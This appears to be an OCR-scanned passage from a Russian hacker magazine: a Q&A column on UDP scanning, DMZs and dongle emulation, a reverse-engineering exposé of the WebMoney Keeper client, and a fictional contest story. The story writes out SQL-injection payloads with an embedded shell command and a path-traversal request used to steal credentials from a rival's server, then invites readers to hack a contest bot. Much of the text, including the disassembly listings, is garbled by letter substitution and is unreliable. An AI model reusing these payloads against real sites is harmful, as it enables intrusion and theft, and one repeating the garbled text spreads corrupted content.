состоит в том, что ты сканируешь по ТСР-про- 
токолу. Зузіод работает по ІЮР-протоколу, 
поэтому птар не видит открытый ІЮР-порт. 
Просто укажи птар параметр -зіі в команд- 
ной строке и проведи ІЮР-сканирование. 
Многие хацкеры при исследовании хоста ска- 
нируют ТСР-порты, напрочь забывая проска- 
нировать ІЮР-порты, а ведь там тоже может 
быть много вкусного. 

О: Постоянно встречаю термин «деми- 
литаризованная зона» (ОМ2), но так и 
не понял, что это такое и как работает? 

А: Термин «демилитаризованная зона» 
(Оетіікагігеб гопе — 0М2) пришел в сетевой 
мир из реальной жизни. Когда-то демилита- 



ризованной зоной называлась знаменитая 
Берлинская стена, сейчас 0М2 существует 
только между Северной и Южной Кореей. То 
есть 0М2 — это граничный район (полоса), 
который разделяет две стороны и офици- 
ально не принадлежит ни одной из них, хотя 
представители обоих сторон могут находить- 
ся в демилитаризованной зоне. В мире сете- 
вой безопасности 0М2 используют для раз- 
деления внутренней и публичной сетей. 0М2 
является практически незащищенной зоной, 
доступ к которой можно получить как из 
внутренней, так и из публичной сети. В 0М2 
обычно помещают публичные услуги: ѴѴеЬ- 
серверы, Ргоху-серверы, почтовые серверы 
и т.д. Внутренняя локальная сеть отделена от 
0М2 и защищена межсетевым экраном. Суть 
этого решения заключается в почти полной 
изоляции публичных серверов от внутрен- 
ней локальной сети, но лишь для соедине- 
ний исходящих с этих серверов, поскольку 
эти соединения могут быть инициированы 
хакером, захватившим контроль. Даже если 
хакер сможет захватить контроль над одним 
из серверов в 0М2, он не сможет получить 
бесконтрольный доступ во внутреннюю сеть. 



О: Что такое «донгл»? 

А: Донглами (от англ, бопдіе) называют элек- 
тронные ключи, которые предназначены для 
защиты отнелицензионного использования и 
распространения программ. Донглы обычно 
представляют собой микросхему, помещен- 
ную в корпус. Самыми известными донглами 
в нашей стране является серия ключей НАЗР 
от израильской компании АІаббіп Кпоѵѵіесіде 
Зузіетз. Кстати, неизвестно точное проис- 
хождение слова бопдіе. По одной из версий, 
это слово происходит от имени системного 
инженера РаіпЬоѵѵ ТесИпоІодіез «Ооп СаІІ». 
Современные донглы изготавливаются под 
БРТ-или ІІЗВ-разъем. Какправило, защищае- 
мая программа периодически делает запро- 
сы кключу, аключ шлет ответы. Если донгл бу- 
дет отсутствовать в разъеме, то защищаемая 
программа откажется работать. Разумеется, 
защиту с помощью электронных ключей ха- 
керы научились обходить. Обычно они просто 
изготавливают программный эмулятор ключа, 
который перехватывает запросы программы 
и шлет ей ответы, эмулируя работу донгла. 

На русском языке есть замечательный сайт, 
посвященный электронным ключам, который 
так и называется ѵѵѵѵѵѵ.бопаіе.ги. Гп7 
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ІКРИС КАСПЕРСКИі 



ПРАВДА 
О ѴѴЕВМОЫЕѴ 



ЧЕМ ОПАСЕН ММ-КЛИЕНТ 



КАКУЮ ИНФОРМАЦИЮ СОБИРАЕТ О НАС СИСТЕМА Ѵ\ІЕВМОМЕѴ, МОЖНО ЛИ ЕИ 
К ВЕСЬМА НЕУТЕШИТЕЛЬНЫМ ВЫВОДАМ, КОТОРЫХ ПРИДЕРЖИВАЮТСЯ 
МАЛЬНУЮ АНОНИМНОСТЬ? 
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> Определение собственного МАС-адреса при помощи штатной 
утилиты ірсопйд 




> Онлайновый декодер ІОСТІ_ кодов 



опулярная платежная система 
ѴѴеЬМопеу реализована в виде двух 
независимых программ: Кеерег 
СІаззіс и Кеерег ЫдІпі, каждая из которых имеет 
свои достоинства и недостатки. Кеерег СІаззіс 
представляет собой обычное ѴѴіпсІоѵѵз-прило- 
жение, требующее инсталляции на компьютер. 
Вот что об этом говорят некоторые пользовате- 
ли: «Это — поделка от ѴѴеЬМопеу, в которую не- 
известно что зашито, может, и троян. И даже 
если его там нет, это творение небезупречно: 
пару раз ставил на несколько компов, так они 
стали хромать на обе ноги, вплоть до ВЗОЭ. На 
других же компах работа была нормальной. 
Следовательно, эта программа недоработана 
и ведет себя непредсказуемо». 

Но прикладное приложение, которым пытает- 



Тут же, по соседству с «ѵѵіпіо. зуз», приютились 
текстовые строки: «\\.\РЬузісаЮгіѵе%сІ», 
«\\.\Зсзі%сІ:» и «ЗСЗЮІЗК», недвусмысленно 
свидетельствующие в пользу того, что Кеерег 
работает с жесткими дисками на низком 
уровне! 

А дальше... дальше идет нечто совершенно 
невероятное: 

Фрагмент ѴѴМСІіепІ. ОШ, передающий 
жесткому диску АТА-команды 

. Іех1::100В7А31 ри5Іп557 ; пОиіВіЖегЗіге 

. Іех1::100В7А36 Іеаеах, [еЬр+ОиіВіЖег] 

. іехі:100В7АЗС ризИеах ; ІрОиіВи^ег 

.іехі:100В7АЗО ризІлЗСИ ; пІпВи^егЗіге 

. ІехІ:100В7АЗР Іеаесх, [еЬр+ОиіВіЖег] 



Но это только цветочки. Если поставить 
Кеерег на ѴМѴѴаге, то система ѴѴеЬ-Мопеу ав- 
томатически заблокирует электронный коше- 
лек при первой же попытке оплаты, даже не 
уведомив тебя об этом ! Если бы Кеерег просто 
не работал под ѴМ ѴѴаге, то и черт с ним. Мо- 
жет, они просто не совместимы. . . или ѴМ ѴѴаге 
чего-то дурит (с ней это часто случается). Но 
он ведь работает только до первой транзак- 
ции, а это значит, что вместе с данными о са- 
мой транзакции Кеерег скрытно передает не- 
которую персональную информацию: как 
минимум, конфигурацию оборудования, и, 
возможно, что-то еще. 

Не секрет, что многие используют ѴѴеЬМапу в ос- 
новном для совершения анонимных платежей 
(расплата за взлом, перевод зарплаты в обход 




Самые опытные исследователи могут прибегнуть к тяжелой артилле- 
рии — дизассемблеру ЮА Рго, который покажет, чем на самом деле 
занимается Кеерег при запуске и в процессе перевода денег 



ся казаться Кеерег СІаззіс, не может вызывать 
ВЗОЭ, поскольку это прерогатива драйверов, 
работающих на уровне ядра. Значит, Кеерег 
каким-то образом проникает в ядро, причем не 
совсем легальным путем (отсюда конфликты и 
ВЗОЭ). Во всяком случае, я не видел никакого 
запроса на установку драйверов при инстал- 
ляции, и никаких драйверов не появилось в ка- 
талоге ѴѴІММ7\5узіет32\Эгіѵегз, где им и поло- 
жено быть, но... запуск утилиты В-Зіисііо, 
восстанавливающей удаленные файлы, пока- 
зал наличие созданного и тут же удаленного 
файлаѵѵіпіо. зуз, ссылка на который обнаружи- 
лась в компоненте Кеерег'а: ѴѴМСІіепі. сІІІ. Судя 
по названию, этот драйвер открывает доступ к 
портам ввода/вывода с прикладного уровня, 
что создает нехилую дыру в системе безопас- 
ности, не говоря уже о том, что некорректное 
обращение с портами чревато не только голу- 
быми экранами смерти, зависанием компьюте- 
ра, но и потерей данных вместе с порчей обору- 
дования. 



.іехі:100В7А45 ризіпесх ;ІрІпВи^ег 

.іехі:100В7А46 ризіі 400081л 

; ІоСопігоІСосІе(ІОСТІ_ЗСЗІ_РАЗЗ_ТНРіОиОН) 

. іехі:100В7А4В тоѵебх, [еЬр+ІпОЬіесІ] 

. ІехІ:100В7А4Е ризілебх ;ІлОеѵісе 

. іехі:100В7А4Р саІІ сіз: ОеѵісеІоСопігоІ 

Диску посылается ІОСТІ_-код ЮСТІ__ЗСЗІ_ 
РАЗЗ_ТНП0110Н, позволяющий передавать 
любую АТА-команду в обход операционной 
системы! АТА-команды — это наиболее низко- 
уровневые команды, на которых «разговари- 
вает» диск, и с их помощью можно сделать 
все, что угодно. Малейшая неосторожность 
(или несовместимость) способна разрушить 
содержимое диска или уничтожить его «про- 
шивку», что еще хуже. Девять из десяти, что 
эта процедура используется для чтения пока- 
заний ЗМАРГГ, однако не исключено, что 
Кеерег пишет на диск какую-то гадость. Мне 
было лень досконально изучать этот вопрос, 
поскольку в любом случае Кеерег мутит. 



налоговой и т. д.). Однако эта анонимность толь- 
ко кажущаяся, тем более что компания охотно 
предоставляет сыщикам всю информацию о 
своих клиентах, которую ей только удалось соб- 
рать, асобираетонамногое. . . 

Система Кеерег Ыділі работает только из-под 
браузера и построена на механизме серти- 
фикатов. Никакой дополнительной информа- 
ции о пользователе она не собирает, и един- 
ственной ниточкой, за которую могут 
зацепиться сыщики, оказывается ІР-адрес. 
Не слишком серьезная улика, к тому же все- 
гда существует возможность спрятаться за 
анонимным Ргоху или атаковать один из ком- 
пьютеров и осуществлять все транзакции его 
«руками». К сожалению, по своим функцио- 
нальным возможностям Кеерег І_ідМі значи- 
тельно отстает от СІаззіс'а и к тому же пожи- 
рает намного больше трафика (что для 
медленных соединений весьма актуально). 
Но ставить СІаззіс на свою основную машину 
я так и не рискнул. Почему — читайте ниже. 
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> Утилита В-Зіисііо удаляет драйвер установленный, 
загруженный и удаленный Кеерег'ом 



> Наблюдение за деятельностью Кеерег'а с помощью монитора 
реестра (листинг приводится с сокращениями) 



□ Хакерские инструменты 

Итак, Кеерег СІаззіс лежит у нас в руках, точ- 
нее жужжит жестким диском, устанавливая 
какие-то компоненты, но какие именно — не 
говорит! А еще кто-то вирусов нехорошими 
словами называет! Компьютерный вирус — 
это такая штука, которая скрыто делает на 
твоем компьютере действия, о которых ты 
даже не подозреваешь, а если бы и подозре- 
вал — навряд ли бы дал свое согласие. 

Чтение технической документации и заум- 
ных лицензионных соглашений не дает ни- 
какой полезной информации, и трепанаци- 
ей Кеерег'а приходится заниматься 
самостоятельно. Как это можно осущест- 



поэтому мы будем обращать внимание лишь 
на самые заметные, наименее замаскиро- 
ванные места, сразу же бросающиеся в гла- 
запри анализе. 

□ Внутри Кеерег'а 

Последняя версия Кеерег'а проходила под 
номером 3.0. 0.2 и занимала порядка ~1, 9 Мб. 
После установки надискевпапке ѴѴеЬМопеу 
образовалось множество файлов, среди ко- 
торых были ѴѴеЬМопеу.ехе (пусковой файл, 
размером 183,024 байт, упакованный, по со- 
общению РЕЮ, протектором АЗРгоіесі 1.2х 
— І.Зх) и ѴѴѴѴСІіепі.сІІІ (динамическая библи- 
отека, реализующая основной функционал, 



бовался наш МАС-адрес? А вот зачем! 
МАС-адрес уникален для каждой карты, и, 
хотя его теоретически возможно сменить на 
другой даже без использования программа- 
тора, это считается веской уликой при рас- 
следовании преступления. 

Значит, все-таки Кеерег палит наш компью- 
тер! И насколько глубоко? Берем в руки ЮА 
Рго, загружаем ѴѴѴѴСІіепі. сІІІ внутрь, и пока 
оно там дизассемблируется (а дизассемб- 
лироваться оно будет долго), достаем из за- 
начки непочатую бутылку пива, затягиваем- 
ся сигаретой и думаем, думаем, думаем. . . 
Лучше всего начинать анализ с поиска текс- 
товых строк. Их легко найти в окне «ІЧате 



МеЬМопеу Кеерег СІазБіс не только собирает (и отсылает) приват- 
ную информацию, но и отличается крайне агрессивным поведением. 



вить? Самое простое — перехватить обмен 
Кеерег'а с «базой», снифая трафик любым 
подходящим зпі^ег'ом, например, тем, что 
встроен в персональный брандмауэр ЗуОаіе 
РігеѵѵаІІ, однако, если трафик зашифрован, 
его будет не так-то легко расшифровать! 
Гораздо проще воспользоваться файловым 
монитором и монитором реестра Марка Рус- 
синовича (оба можно найти на 
ѵѵѵѵѵѵ.зѵзіпіегпаіз.сот ). а также монитором 
шины Виз НоипсІ от компании РегізоЙ 
( ѵѵѵѵѵѵ.регізоіТсот ). Полезно также снять 
дамп с работающей программы любой ути- 
литой по вкусу (например, РЕ-ТООБЗ) и поко- 
выряться в нем на предмет интересныхтекс- 
товых строк, МАС-адресов и прочих 
приватных данных. Самые опытные иссле- 
дователи могут прибегнуть к тяжелой артил- 
лерии — дизассемблеру ЮА Рго, который 
покажет, чем на самом деле занимается 
Кеерег при запуске и в процессе перевода 
денег. Естественно, полное дизассемблиро- 
вание занимает слишком много времени, 



размер — 3331, 824 байт, не упакована). 
Собственно говоря, ѴѴеЬМопеу.ехе можно 
сразу отбросить в сторону, не тратя силы на 
распаковку — все равно ничего интересно- 
го там нет. Но прежде нужно запустить мони- 
тор реестра и посмотреть, в какие ветви ре- 
естра лезет Кеерег и не пытается ли он 
получить доступ к той информации, разгла- 
шать которую мы не хотим? 

Даже невооруженным глазом видно, что 
сразу же после запуска Кеерег ринулся оп- 
ределять имя чипа сетевой карты («АМЭ 
РСІЧЕТ Ратііу РСІ Еіігегпеі» в данном случае), 
имя машины («ѴѴ2К»), и, если покопаться в 
дампе памяти, там можно обнаружить и 
МАС-адрес моей сетевой карты: 00-0С- 
29-Р6-6С-ЗС (виртуальный, естественно). 
Кстати, чтобы узнать свой МАС-адрес, до- 
статочно запустить штатную утилиту ірсопРд 
с ключом/аІІ (см. рисунок). 

«Честные» программы не нуждаются в МАС- 
адресах и работают с сетью через ТСР/ІР- 
протоколы. Зачем же тогда Кеерег'у потре- 



ѴѴіпсІоѵѵз», вызываемом комбинацией кла- 
виш <ЗЬіЙ-Р4>. Текстовые АЗСІІ2-строки на- 
чинаются с префикса «а». Действительно, 
здесь притаилось немало непуганой дичи: 

Текстовые строки «ріс_ххх», обнаружен- 
ные в Кеерег е 

. гсІа!а:1021ЕСВ0аРсі_ѵѵт1:ісІ сІЬ 'рсі_\л/т1:ісІ=',0; РАТА 
ХРІЕР: 5ііЬ_1 00901 С0+С45О 
. гсІа1а:1021ЕСВСаРсі_ригзесІезісІЬ '&рсі_ 
ригзесІезіЩО; РАТАХРІЕР: зиЬ_100901С0+СССо 
. гсІа1а:1021ЕСССаРсі_ригзезгссІЬ '&рсі_ 
ригзезгс=',0; РАТАХРІЕР: зиЬ_100901С0+Р53о 
. гиаіа:1021ЕСРСаРсі_атоипШЬ'&рсі_атоипІ=',0; 
РАТА ХРЕР: зиЬ_1 00901 С0+РРАо 
. гсІа!а:1021ЕСЕСаРсі_тагкегсІЬ '&рсі_тагкег=',0; 
РАТАХРІЕР: зиЬ_100901С0+Е61о 
. гсІаіа:1 021 ЕСРС аРсЩезс сІЬ , &рсі_с1езс= , ,0; РАТА 
ХРЕР: зиЬ_1 00901 С0+ЕЕ8о 
. гсІаіа:1 021 ЕР08 аРсЩаІесП сІЬ ’&рсСсІаіесПЩО; 
РАТАХРІЕР: зиЬ_1 00901 СО+РбРо 
. гсІа!а:1021ЕР18аРсі_тосІеТезісІЬ '&рсі_ 
тосІе=іезГ,0; РАТАХРІЕР: зиЬ_100901С0+РРРо 
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> Интересные текстовые строки, обнаруженные дизассемблером ЮА Рго в файле 
ѴѴМСІіепШІ_І_ 



ЮГ Уіеѵі п 


1 : ОЙТО ХВРГ : 


діЬ_І 


0070 КВРГ: бы 


Ь_10ѲВ 


007 0 ИВЕР: эн 


Ь 180В 


0070 КОРГ : бы 


1 ЙЙП 



Семейство строк, гнездящихся вокруг слова 
«рсі», наводит на мысль, что Кеерег опраши- 
вает РСІ-шину для получения списка подклю- 
ченныхустройств. Сканер шины это действи- 
тельно подтверждает, а в дампе памяти 
обнаруживаются идентификационные стро- 
ки всех периферийных устройств. 

Поскольку виртуальные машины, в частнос- 
ти ѴМѴѴаге, несут на своем борту довольно 
специфический набор оборудования и выде- 
ляют МАС-адреса из фиксированного пула 
адресов, становится ясно, как система рас- 
познает факт наличия виртуальной машины. 
Она просто сравнивает конфигурацию поль- 
зовательского оборудования с конфигура- 



цией виртуальной машины, и, если они сов- 
падают, электронный кошелек закрывается 
без предупреждений. Причем сравнение 
происходитненаклиентской, анасерверной 
стороне! То есть Кеерег не просто опрашива- 
ет РСІ-шину, но еще и передает эти данные в 
сеть, где они, по всей видимости, заносятся в 
банк данных, представляющий огромный ин- 
терес для спецслужб различных стран. 
Штатные средства ѴМѴѴаге не позволяют ме- 
нять ни МАС-адреса, ни конфигурацию обо- 
рудования (в новых версиях вроде бы сдела- 
ны некоторые шаги в этом направлении, но 
не слишком радикальные). К счастью, есть 
неофициальная заплатка, позволяющая ме- 
нять все, что угодно: ІтІІрѴ/ІтопеѵпеІ.гзІаск. 
ога Лооіз/ѵтраісіп.с . Эксперименты под- 
тверждают: после изменения конфигурации 
Кеерег перестает распознавать ѴМѴѴаге, и 
электронный кошелек больше не «палится». 
В текстовых строках можно ковыряться до 
бесконечности. Это настоящий Клондайк, 
раскрывающий зловредные намерения 



Кеерег'а хуже любого предателя. На месте 
разработчиков я бы обязательно их зашиф- 
ровал, а то как-то несерьезно получается. 
Как вам нравится следующее? Кеерег дина- 
мически создает драйвер сШо. зуз (на 
І\ІТ/ѴѴ2К/ХР)/сіІіо. ѵхсі (на 9х), тут же его за- 
гружает в память, а после удаляет: 

Ссылки на неопознанный драйвер, 
обнаруженные в Кеерег е: 

. гсІаіа:1 0222Р5С а3уз1ет320гіѵег сІЬ 
'зуз1ет32\сІгіѵегз\сі1іо. зуз',0 
. гсІаіаЛ 0222078 аРІІеІЧате сІЬ '\\.\сШо',0 
. гсІаіа:1 0222Р8С аЗузіетСіііо_ѵх сІЬ 'зузіетХсіііо. 
ѵхсі', 0 



. гсІаіа:1 0222РА0 а_Сіііо_ѵхсІ сІЬ ЛѴХСІТЮ. ѴХР',0 

С самим драйвером я не разбирался. Выяс- 
нил только, что он имеет размер 4048 байт и, 
по сообщениям на форумах, часто является 
источником многих проблем. Тутуже дело не 
в конфиденциальности, а в надежности и 
стабильности работы. Мастерить драйвера 
— это вам не прикладные программы пи- 
сать. Малейшая небрежность/неосторож- 
ность превращается в сплошной геморрой. 
Зачем пускать к себе на компьютер заведо- 
мо некорректно написанную программу?! 
«Источники, приближенные к кругам разра- 
ботчиков» сообщили, что все эти драйвера 
вставлены вовсе не из-за пакости или жела- 
ния навредить пользователю. Напротив! 
Они охраняют Кеерег от нехороших про- 
грамм, крадущих электронную наличность. 
Как говорится, все на благо пользователя, 
даже если это благо идетему вопреки. Я пов- 
торяю еще раз: нормально спроектирован- 
ный платежный клиент работает исключи- 



тельно на прикладном уровне, а не 
вгрызается в систему, как бульдозер в ас- 
фальт. Если на компьютер проникла зло- 
вредная программа, захватившая админис- 
траторские права (а такие права заполу 
чить очень легко), она может вытворять с 
Кеерег'ом все, что угодно, и никакие драй- 
вера не в состоянии ее остановить, посколь- 
ку, после того как зловредная программа 
загрузит свой собственный драйвер, она 
уровняет свои шансы с Кеерег'ом, а в проти- 
востоянии двух драйверов обороняющаяся 
сторона всегда обречена на поражение. 

Но не будем зацикливаться на текстовых 
строках и двинемся дальше. Посмотрим на 
список импортируемых АРІ-функций. Для 
этого достаточно воспользоваться утилитой 
битрЫп. ехе, входящей в штатную поставку 
компилятора МісгозоІІ ѴізиаІ С++ и РІаНогт 
ЗЭК. Вызываем ее («битрЫп. ехе/ЕХРО- 
РТЗ ѴѴМСІіепі. сІІІ > оиіриі») и смотрим на ре- 
зультат: 

Функции, импортируемые Кеерег'ом 
(фрагмент): 

ОитроНіІеѴѴМСІІепі. сІІІ 

КЕРЫЕЬЗг. сІІІ 

83 ОеѵісеІоСопігоІ 

353ТІпгеасІ32Мехі 

352ТЬгеасІ32РігзІ 

28С Ргосезз32Ыехі 

262 МосІиІе32Мехі 

260 МосІиІе32Рігз1 

204 Неар32І_ізШехІ 

203 Неар32І_ізіРігзі 

28АРгосезз32РігзІ 

6С СгеаіеТооІІпеІр323парзІпоі 

Функции семейства ТООІ_НЕІ_Р32(СгеаіеТоо 
ІІіеІр323парзІтоі (), Ргосезз32Рігз1 (), 
Неар32І_ізіРігзІ (), Неар32І_із1І\Іех1 (), 
МосІиІе32Рігзі (), МосІиІе32Мехі (), 
Ргосезз32І\Іехі (), ТНігеасІ32Рігз1 () и 
ТІтгеасІ32[\Іехі ()) служат для получения 
списка процессов и потоков, имеющихся в 



Кеерег — идеальное средство для удаленного 
наблюдения за миллионами машин. 
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> Вся работа через Кеерег ЕідИІ осуществляется через браузер 



системе. Только зачем Кеерег'у знать об 
этом?! Чтобы «отлавливать» троянские 
программы?! Непохоже... Троянские про- 
граммы меняют свои имена как перчатки, и 
к тому же никакого «черного списка» внут- 
ри Кеерег'а нет. Судя по всему, он передает 
их на сервер, и умные дядьки смотрят: а ка- 
ким, собственного, программным обеспе- 
чением мы пользуемся? И где гарантия, что, 
увидев ОІІуЭЬд, РЕ-ТООБЗ и прочие хакерс- 
кие утилиты, они не ликвидируют наш акка- 
унт или не настучат «куда нужно»? Кеерег 
— идеальное средство для удаленного на- 
блюдения за миллионами машин, тем более 
что своего любопытства он даже и не скры- 
вает. Больше всего смущает наличие функ- 
ций Неар 32і_і5іРігзі () и Неар32І_із{[\Іехі (), 
выдающих карту памяти каждого из про- 
цессов. 

А функция ЭеѵісеІоСопігоІ () — это вообще 
ласты. Ее основное предназначение — по- 
сылать драйверам специальные управляю- 
щие ІОСТБ-коды, с помощью которых можно 
напрямую читать или писать на диск. Пос- 
кольку разработчики никак не замаскиро- 
вали ее вызов, все ІОСТБ-коды видны в ЮА 
Рго как на ладони! Давайте разберемся, 
что же такого делает Кеерег с нашим обо- 
рудованием, чего нельзя было бы сделать с 
помощью нормальных АРІ-функций?! 
Переходим в ЮА Рго, нажимаем <ЗІті^-Р4> 
дляоткрытияокна«І\Іате», пишем «Эеѵісеіо 
СопігоІ» (полностью вводить имя не обяза- 
тельно — ЮА Рго сама поставит курсор на 
него, как только поймет, что же мы от нее 
хотим). Теперь нажимаем <Е!\ІТЕР> и ока- 
зываемся в секции импорта. По умолчанию 
ЮА Рго отображает только первые две пе- 
рекрестные ссылки. Чтобы увидеть осталь- 
ные, необходимо в меню «Ѵіеѵѵ» выбрать 
пункт «Ореп зиЬѵіеѵѵ», а там — «Сгозз 
геіегепсез» или просто нажать <АБТ- 
Ѵ>,<0>,<0>. 

Первая же перекрестная ссылка ведет 
нас к следующему коду, который нам сей- 
час и предстоит дешифровать: 

Фрагмент Кеерег'а, вызывающий 
функцию ОеѵісеІоСопІгоІ 

. іехі:100В76СЗ ризіп 0; ІрОѵегІарресІ 



. іехі:100В76С5 Іеаесіх, [еЬр+ВуіезНеІигпесІ] 

. ІехІ:100В76СВ ризЬ есіх ; ІрВуіезНеіигпесІ 

. 1ехЫ00В76СС ризИ 18Н ; пОиШиІІегЗіге 

. 1ехЫ00В76СЕ Іеаеах, [еЬр+ОиШіШег] 

. іѳхі:100В76Р4 ризіі еах ; ІрОиіВиЛег 

. іехі:100В7605 ризіп 0 ; пІпВиТегЗіге 

ДехІ:100В7607 ризГі 0 ; ІрІпВиТТег 

. ІехЫ00В76О9 ризИ74080Ь 

. 1ехТ100В760Е тоѵесх, [еЬр+ЬОЬіесІ:] 

. іехі:100В76Е4 ризіп есх ; ГЮеѵісе 

. іехі:100В76Е5 саІІ сіз: ОеѵісеІоСопІгоІ 

Прокрутив дизассемблерный листинг 
вверх, мы узнаем, что в переменной [еЬр + 
ІтОЬіесі] находится дескриптор, возвра- 
щенный функцией СгеаіеРіІеА (), которой 
скормили строку»\\.\РНузісаЮгіѵе%сІ». 
Очень интересно! Значит, перед нами код, 
напрямую взаимодействующий с жестким 
диском. Но как именно он с ним взаимодейс- 
твует? Ответ скрыт в ІОСТБ-коде, равном 
74080Б. Все, что нам нужно, — перевести его 
в удобочитаемую константу, а для этого не- 
обходимо знать, как формируются ІОСТБ- 
коды, или воспользоваться опііпе-калькуля- 
тором, доступном на ѵѵѵѵѵѵ.озгопііпе.сот/ 
агіісіе.сіт? аг!ісІе=229 . 

Вводим ЮСТБ-код в окошко «ѴАШЕ» и полу- 
чаем полную расшифровку: Эеѵісе — ЭІЗК 
(0x7), Рипсііоп — 0x20, Ассезз — «РЮЕ_ 
ЯЕАЭ_АССЕЗЗ», МеіНосІ — «МЕТНСЮ_ 
ВБІРРЕРЕЭ». Ага, значит, чтение. Ну хорошо 
хоть не запись! Однако запись еще впереди! 
Например: 

Еще один фрагмент Кеерег'а, вызывающий 
функцию ОеѵісеІоСопІгоІ 

. іехі:100В7Р63 ризЬО ; ІрОѵегІарресІ 

. іехі:100В7Р65 тоѵесх, 

[еЬр+ІрВуіезРіеіигпесІ] 

. іехі:100В7Р68 ризГіесх ; ІрВуіезРіеіигпесІ 

. іехі:100В7Р69 ризН 2101л ; пОиіВиііегЗіге 

. іехі:1 00В7Р6Е тоѵ есіх, [еЬр+ІрОиіВиііег] 

. іехі:100В7Р71 ризГіесІх ЦрОиіВиііег 

. іехі:100В7Р72 ризГі20Гі ; пІпВиІІегЗіге 

. іехі:100В7Р74 тоѵ еах, [еЬр+ІрІпВиііег] 

. іехі:100В7Р77 ризііеах ; ІрІпВиііег 

.іехі:100В7Р78 ризіі7С088Р 

. іехі:1 00В7Р7Р тоѵ есх, [еЬр+ГЮеѵісе] 



. іехі:100В7Р80 ризГіесх ; ІіОеѵісе 

. іехі:100В7Р81 саІІ сіз: ОеѵісеІоСопІгоІ 

Калькулятор говорит, что ЮСТБ-код 7С088ІТ 
обеспечивает как запись, так и чтение дан- 
ных с диска на секторном уровне в обход 
файловой системы и всех установленных 
ею ограничений. Возможно, что Кеерег со- 
здает на 

жестком диске какой-то «тайник» или свое- 
образную метку, помогающую «людям в по- 
гонах» отождествить его. Или это просто 
Кеерег так привязывается к оборудованию, 
чтобы его было нельзя запустить с чужого 
компьютера (скорее всего, так оно и есть, 
ведь ѴѴМ Кеерег не загрузит ключи на дру- 
гом железе. — Прим. ред.). Кто знает — пол- 
ное исследование требует большой кон- 
центрации сил, ресурсов и времени, но 
вряд ли конечный результат стоит этого, 
поскольку и без того ясно, что за зверь этот 
Кеерег (а еще невинным муравьем прики- 
дывается!). 

□ Заключение 

Мы выяснили, что Кеерег СІаззіс не только 
собирает (и отсылает) приватную инфор- 
мацию, но и отличается крайне агрессив- 
ным поведением. Скрываясь под аляпова- 
тым интерфейсом прикладной программы, 
он пробивает тоннель к самому центру 
операционной системы и делает это на- 
столько некорректно, что у ряда легаль- 
ных пользователей появляются серьез- 
ные проблемы. 

Я категорически не рекомендую устанав- 
ливать эту штуку на свой компьютер. Вот 
если бы Кеерег распространялся в откры- 
тых текстах с полностью специфициро- 
ванными протоколами... Компания ниче- 
го бы не потеряла, наоборот, только 
приобрела. Эксперты указали бы на 
ошибки, армия БІІЧБІХ-пользователей не 
трахалась бы с ѴѴіпсІоѵѵз-эмуляторами, а 
спокойно переносила Кеерег'а на на- 
стольные и мобильные системы, добавляя 
миллионы новых клиентов. Почему же это- 
годо сих пор не сделано?! Уж не потому ли, 
что Кеерег'у есть что скрывать?! Ійі 
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* фирме «Ромашка» — грандиозная пьянка. Празднуют 

устранение главного конкурента на рынке биологичес- 
ких почвенных добавок — «Гладиолуса». На празднест- 
ве неоднократно поднимали бокалы за крутого хакера РІак ( 1|ак@ 
ШІе22ти). Поговаривают, что этотпареньсмогдоказать незаконную 
деятельность «Гладиолуса», которая заключалась в засылке пинча 
своим конкурентам. Сделал он это примерно так. 

На главной странице сайта «Гладиолуса» он провел ЗОЬинъекцию 
в регі-скрипте главной страницы, используя следующий запрос: 
»/іпсІех. НітІ? ісІ=-1 ІІІМЮІМ ЗЕІ_ЕСТ ‘I рѵѵсІГ». Рассчитывая на склон- 
ность регі-функции ореп исполнять шелл-команды между палочка- 
ми Т, хакер узнал путь к главному сценарию »/изг/ІосаІ/ѵѵѵѵѵѵ/таіп». 
Естественно, он смог прочесть исходник регі-скрипта іпсіех. Іпііті . 
Для этого хакер сделал следующий запрос: »/іпсІех. ІпІппІ? іб=-1 
СІ N ІОИ ЗЕІ_ЕСТ ‘../../../../../../../../изг/іосаі/ѵѵѵѵѵѵ/таіп’». В исходниках 
были прописаны логин и пароль к базе данных, которые удивитель- 
ным образом подошли и к шеллу. Правда, шелл оказался слишком 
урезанным: существовала возможность выполнять только об, Із, 
есбо, іб, рѵ\/б и регі. Причем Із был явно модифицирован и скрывал 
некоторые директории. Для того чтобы обнаружить эти самые скры- 
тые каталоги, достаточно было написать простенький регі-скрип- 
тик, выполняющий работу команды Із, и вогнать его в регі. Таким 
образом, хакер нашел директории »/зесгеі_іір», »/зесгеі_зоигсез», 



»/зесгеі_Ьіп» и »/зесгеі_сопІід». 

/зесгеМір содержал: 

• погт — директория, в которой хранятся нормальные файлы для Іір; 

• ѵігизез — катал о г для тех, кому надо отправлять вирусы. Однако для 
просмотра содержимого не хватает прав; 

/зесгеОзоигсе содержал исходники ргоіірб, пропатченные для за- 
сылки вирусов, /зесгеЦэіп — команду ср, которую хакер имел право 
исполнять, а /зесгеі_соп{ід — файл ѵігизаббгз.М, который юзался про- 
патченным ргойрб. 

С помощью найденной команды ср хакер ГІакскопировал исходники в 
директорию »/зесгеі_Йр/погт» и слил их поіір. Далее он нашел изме- 
нения, внесенные в код недобропорядочными сотрудниками «Гладио- 
луса», и добавил в ѵігизаббгз.М строчку, благодаря которой он смог 
увидеть папку с вирусами. Все данные расследования, проведенно- 
го ГІак'ом, были переданы в отдел по компьютерным преступлениям 
и правонарушители были подвергнуты наказанию. Правда, сам Пак 
тоже совершил компьютерное преступление, но благодарная «Ро- 
машка» отмазала хакера от неизбежного наказания :). 

В конкурсе этого месяца тебе придется повозиться с ісд-ботом. Если у 
тебя есть желание и некоторые умения в области взлома, ты склонен 
к экспериментам, а также терпелив, ну и конечно, любознателен, то у 
тебя все шансы порутать сервак первым и заполучить приз! Для этого 
заходи в 20-х числах на сайт копкигз.хакер.ги и врубайся в тему. ПС 
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ТЫ, КОНЕЧНО, УЖЕ НЕ РАЗ СЛЫШАЛ О ТАКОЙ НОВОМОДНОЙ ТЕХНОЛОГИИ, КАК ВЕЮ. ВСЕ ЧАЩЕ МОЖНО ВСТРЕТИТЬ 
В ПРЕССЕ И В ИНТЕРНЕТЕ УПОМИНАНИЯ О НЕЙ, СПОРЫ, ВОЗНИКАЮЩИЕ МЕЖДУ СТОРОННИКАМИ И ПРОТИВНИКАМИ 
ПОВСЕМЕСТНОГО РАСПРОСТРАНЕНИЯ ЭТОЙ ТЕХНОЛОГИИ, А ТАКЖЕ СВОДКИ НА САЙТАХ ПО ИНФОРМАЦИОННОЙ БЕЗО- 
